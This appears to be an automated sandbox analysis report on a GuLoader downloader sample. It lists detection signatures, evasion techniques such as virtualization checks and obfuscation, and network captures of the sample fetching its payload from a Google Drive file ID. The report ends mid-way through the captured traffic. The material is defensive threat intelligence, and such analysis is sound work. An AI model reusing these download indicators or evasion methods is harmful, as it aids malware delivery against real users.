Windows Analysis Report
QNuQ5e175D.exe

Overview

General Information

Sample name: QNuQ5e175D.exe (renamed because the original name is a hash value)
Original sample name: e5fd95536576d21b43b1552aed3040ea366375b5a952c333dd89f1ed251c12aa.exe
Analysis ID: 1588755
MD5: 9bb2cdb8508ee2255a35ecec43462a48
SHA1: c7465e8b0a3ae61b23520752afbb8bf89a3cecdd
SHA256: e5fd95536576d21b43b1552aed3040ea366375b5a952c333dd89f1ed251c12aa
Tags: exe, signed, user-adrian__luca

Detection

GuLoader
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • QNuQ5e175D.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\QNuQ5e175D.exe" MD5: 9BB2CDB8508EE2255A35ECEC43462A48)
    • QNuQ5e175D.exe (PID: 7776 cmdline: "C:\Users\user\Desktop\QNuQ5e175D.exe" MD5: 9BB2CDB8508EE2255A35ECEC43462A48)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000004.00000002.3567436763.00000000017EC000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security

Source: 00000000.00000002.1944070834.000000000456C000.00000040.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security

No Sigma rule has matched

Timestamp: 2025-01-11T05:13:09.535463+0100
SID: 2803270
Severity: 2
Classtype: Potentially Bad Traffic
Source IP: 192.168.2.4
Source Port: 49736
Destination IP: 142.250.184.206
Destination Port: 443
Protocol: TCP

AV Detection

Source: QNuQ5e175D.exe | ReversingLabs: Detection: 44%
Source: QNuQ5e175D.exe | Virustotal: Detection: 63%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: QNuQ5e175D.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49886 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49968 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50014 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50016 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50018 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50020 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:50021 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50022 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50024 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50026 version: TLS 1.2
Source: QNuQ5e175D.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_004068D4 FindFirstFileW,FindClose,0_2_004068D4
Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C83
Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_00402930 FindFirstFileW,0_2_00402930
Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 4_2_00402930 FindFirstFileW,4_2_00402930
Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 4_2_004068D4 FindFirstFileW,FindClose,4_2_004068D4
Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 4_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405C83
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 142.250.184.206:443
Source: global traffic | HTTP traffic detected:
    GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Cache-Control: no-cache
    Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
Source: global traffic | HTTP traffic detected:
    GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRRBVsFxWTiDXRQfidilVLR7Ia_EU_qZLAq0WddOUff271D59_toVqXUgkjvGuP1NvW-SLU7kMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:13:10 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-XNdeAJo4p6EC-YET1IzUqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd; expires=Sun, 13-Jul-2025 04:13:10 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRYzgcgZ9Wbmh56G03AjHcbsBtLw5tB8qfvxusdV58TJjo670Z-NCTllD9fVsmaV0t7aeLhmh4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:13:22 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-RvEYxCsBG6gYbcFQNKwrrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSAPf1LDa9mbRyVt3wFxVi_mf2ZhK4G77OC45KZGIFsfiCRYyQNUYjg44JKg5LjP0y2352r9KsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:13:34 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Irh2BwOx6FeYaELw0I71-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC74Z7wj3dNfFJ2ww21Cok96tTb__X6y5tNVWEkDR6_VkkLawFs1lf9WDObcyb5J8ubTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:13:46 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Qsd--4vV_Jhh6LUxnWo32w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQRM5utXp5ejsPbRyIKVp5p5DZITeKIORxY-a4aKBmZfiC3lPcvGxNHGufnAU2v8ZAiquIf5rkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:13:59 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-WXRINWntd-QKU3LV0NQD1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQepwL3X8bSe-R9rdKhZRT_MAfxTRznKm_KaczQJNbkuQGNzP4KwDRR-A6Tlq-77eRQPgNfrqYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:14:11 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-CgtWUXN1hCu2CjyUOZkq3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ7u5BAW8jRP-miQYp0-QWtnpzvShLwc52rxHINiWbMhJcQu4lmchCp9wgbQvw0uVraContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:14:23 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-EW-iSWlwlNDYnMbHYaBvQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRlD7hFYyBuizeg1e5mSmbLEPPNpdWTk3Zg2emGlH_mIk3_0ZZmeekOyUDv3jy0HTRxContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:14:35 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-hrIgp9iCnLYobQ1jA1kzoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSnY6MHVQZHWiVUxGsXY2lK-pXKUqzAIOHDDJSm2CFsqzvb19yD943GHOpNh63vf21_9XC72owContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:14:47 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-zKVdffCKg-qiUCMhY6inUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQjNjklE7Z7CkrJ0c2eibhlxijgDHGsFK4sfozC0ktT1FF00VTnE6TLNLOKAHvwqTUoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:15:00 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-_bS7AF2ooonXMRoz1QntCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRHiIk5OWEIMiNuXmNwG47Tjv0GwWBQh3X97hgHQnmrfthBIcQ2NQ2USWJYTOE9NQd_lw6GsfUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:15:12 GMTContent-Security-Policy: script-src 'nonce-OJtKk1cEY_gxfHRSLrA8Kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri 